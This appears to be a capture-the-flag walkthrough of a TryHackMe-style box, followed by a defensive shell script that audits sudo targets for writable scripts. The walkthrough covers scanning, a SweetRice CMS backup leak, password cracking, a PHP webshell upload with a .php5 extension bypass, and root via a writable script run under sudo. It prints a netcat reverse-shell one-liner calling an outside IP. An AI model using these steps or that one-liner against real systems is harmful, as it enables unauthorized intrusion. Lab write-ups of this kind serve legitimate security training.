Nmap

First we scan for open ports.

# nmap -p- -T4 -sV -sC 10.10.68.91 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 00:23 GMT
Nmap scan report for 10.10.68.91
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds

Website

Looking at the website, it is just the standard Ubuntu Apache default page, so straight to gobuster.

# gobuster dir -u http://10.10.68.91 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.68.91
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/content              (Status: 301) [Size: 312] [--> http://10.10.68.91/content/]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 276]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

This reveals the /content/ directory, and navigating there we see a simple page served by SweetRice CMS.

Checking Exploit-DB reveals a backup disclosure vulnerability, and navigating to the URL does indeed give us access to an SQL backup.

After downloading the SQL file and looking inside it, a line stands out.

The hash looks like an MD5 and a quick visit to CrackStation gives us the password. With this we can now log in to the site. Looking through the available exploits, it looks like we can upload files using the Media Center part of the CMS. Let's upload a basic PHP shell. The site didn't accept .php files, however simply renaming it to .php5 worked around this.

Using this webshell we can get a reverse shell back and read the user flag.

# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.68.91] 53012
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home 
itguy
$ cd /home/itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{6******************************7}

Privilege escalation

Checking the user's sudo privileges, we see they can execute a script as root without a password.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Looking at the script, we don't have permission to change it, but it calls another script which we do have write permission over.

$ ls -l /home/itguy/backup.pl
-rw-r--r-x 1 root root 47 Nov 29  2019 /home/itguy/backup.pl
$ cat /home/itguy/backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
$ ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

After replacing the IP in /etc/copy.sh with our own, we can start a listener and call the first script via sudo to get a reverse shell back as root.

# nc -lvnp 5554
listening on [any] 5554 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.68.91] 49640
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{6******************************f}
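The root path above rests on a sudo NOPASSWD rule whose target, backup.pl, is itself locked down but hands off to a script anyone can write. As an added example (not part of this writeup), the following shell audit checks a sudo target and every script it references by absolute path for group/other write bits; the demo files, paths and modes it creates are constructed to mirror the layout seen on the box.

```shell
#!/bin/sh
# Added audit helper, not from the writeup: given a script that a sudo NOPASSWD
# rule allows, report whether it or any script it hands off to (an absolute
# path such as the /etc/copy.sh seen above) is writable by group or other.
# Assumes paths without whitespace and a POSIX ls.

# Return 0 when the group or other write bit is set, parsed from ls -ld
# (positions 6 and 9 of a mode string such as -rw-r--rwx).
writable_by_nonowner() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Print each existing regular file referenced by absolute path in a script.
referenced_files() {
    grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u | while read -r p; do
        if [ -f "$p" ]; then echo "$p"; fi
    done
}

# Audit a sudo target and everything it references. Prints one WEAK line per
# file writable by non-owners; returns 0 if the chain is clean, 1 otherwise.
audit_sudo_target() {
    weak=0
    for f in "$1" $(referenced_files "$1"); do
        if writable_by_nonowner "$f"; then
            echo "WEAK: $(ls -ld "$f" | cut -c1-10) $f"
            weak=1
        fi
    done
    [ "$weak" -eq 0 ]
}

# Constructed demo mirroring the writeup's layout: a 0644 Perl wrapper that runs
# a helper script which is 0647, i.e. writable by everyone (ownership is left
# as the current user because chown needs root; the mode check is independent).
setup_demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "backup placeholder"\n' > "$d/copy.sh"
    printf '#!/usr/bin/perl\n\nsystem("sh", "%s/copy.sh");\n' "$d" > "$d/backup.pl"
    chmod 0644 "$d/backup.pl"
    chmod 0647 "$d/copy.sh"
    echo "$d"
}
DEMO=$(setup_demo)
audit_sudo_target "$DEMO/backup.pl" || echo "sudo target chain is not tamper-proof"
```

Run against a real rule, point audit_sudo_target at each command path listed by sudo -l; a clean chain prints nothing and exits 0.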